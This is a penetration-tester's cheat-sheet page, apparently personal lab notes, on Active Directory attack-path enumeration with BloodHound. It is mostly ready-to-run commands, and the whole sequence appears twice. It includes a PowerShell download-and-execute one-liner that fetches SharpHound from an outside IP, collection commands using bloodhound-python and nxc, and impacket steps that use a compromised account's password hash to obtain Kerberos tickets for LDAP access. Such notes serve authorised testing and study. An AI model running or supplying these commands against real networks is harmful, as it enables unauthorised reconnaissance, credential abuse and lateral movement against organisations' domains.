Bloodhound

PingCastle --healthcheck --server mydomain.com

docker

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.185/SharpHound.ps1')

Invoke-BloodHound -CollectionMethod "All,GPOLocalGroup" -Domain tree.corp.com

net start neo4j

bloodhound-python -v -u user -p password -ns <nameserver> -d <domain> -dc <dc> -c all,LoggedOn
#-k kerberos with ccache ; --hashes hash

nxc --verbose ldap <ip> -u user -p pass --bloodhound -ns <nameserver-ip> -d <domain> --collection All
#-k kerberos with ccache (need cifs requested) ; -H hash 
# may config /etc/krb5.conf
#need to have the vulnerable account compromised & has its hash
# impacket-getTGT corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip xx.xx
# impacket-getST -spn cifs/targethost.domain.com corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip {}

may need to have ldap requested in ticket if use in kali (may request in victim machine first then copy the ticket out with it included)

kvno ldap/dmzdc01.complyedge.com@COMPLYEDGE.COM

use impacket

impacket-getTGT corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip {}

export KRB5CCNAME=victim.ccache

impacket-getST -spn ldap/dc.corp.com:1433 corp.com/victim -k -no-pass -dc-ip {}

export KRB5CCNAME=ldap.ccache

kvno ldap/dmzdc01.complyedge.com@COMPLYEDGE.COM

need ldap ticket b4 collection

/etc/hosts
172.16.177.168	complyedge.com dmzdc01.complyedge.com

/etc/resolv.conf
nameserver 172.16.177.168

bloodhound-python -u pete -k  -v -c all,LoggedOn -d complyedge.com -ns 172.16.177.168 -dc dmzdc01.complyedge.com --dns-timeout 500 --disable-pooling --dns-tcp --zip

Cyphers

PreviousActive Directory NextForest

Last updated 1 year ago

Bloodhound

PingCastle --healthcheck --server mydomain.com

docker

IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.185/SharpHound.ps1')

Invoke-BloodHound -CollectionMethod "All,GPOLocalGroup" -Domain tree.corp.com

net start neo4j

bloodhound-python -v -u user -p password -ns <nameserver> -d <domain> -dc <dc> -c all,LoggedOn
#-k kerberos with ccache ; --hashes hash

nxc --verbose ldap <ip> -u user -p pass --bloodhound -ns <nameserver-ip> -d <domain> --collection All
#-k kerberos with ccache (need cifs requested) ; -H hash 
# may config /etc/krb5.conf
#need to have the vulnerable account compromised & has its hash
# impacket-getTGT corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip xx.xx
# impacket-getST -spn cifs/targethost.domain.com corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip {}

may need to have ldap requested in ticket if use in kali (may request in victim machine first then copy the ticket out with it included)

kvno ldap/dmzdc01.complyedge.com@COMPLYEDGE.COM

use impacket

impacket-getTGT corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip {}

export KRB5CCNAME=victim.ccache

impacket-getST -spn ldap/dc.corp.com:1433 corp.com/victim -k -no-pass -dc-ip {}

export KRB5CCNAME=ldap.ccache

kvno ldap/dmzdc01.complyedge.com@COMPLYEDGE.COM

need ldap ticket b4 collection

/etc/hosts
172.16.177.168	complyedge.com dmzdc01.complyedge.com

/etc/resolv.conf
nameserver 172.16.177.168

bloodhound-python -u pete -k  -v -c all,LoggedOn -d complyedge.com -ns 172.16.177.168 -dc dmzdc01.complyedge.com --dns-timeout 500 --disable-pooling --dns-tcp --zip

All SharpHound Community Edition Flags, ExplainedBloodHound

https://support.bloodhoundenterprise.io/hc/en-us/articles/17481151861019-SharpHound-Community-Editionsupport.bloodhoundenterprise.io

How to Use BloodHound to Hack Active Directory: A Full GuideStationX

Finding Active Directory attack paths using BloodHound – Compass Security Blog

BloodHoundPixis

Cyphers

BloodHound Cypher Cheatsheethausec

GitHub - awsmhacks/awsmBloodhoundCustomQueries: Collection of cyphers for bloodhoundGitHub

PreviousActive Directory NextForest

Last updated 1 year ago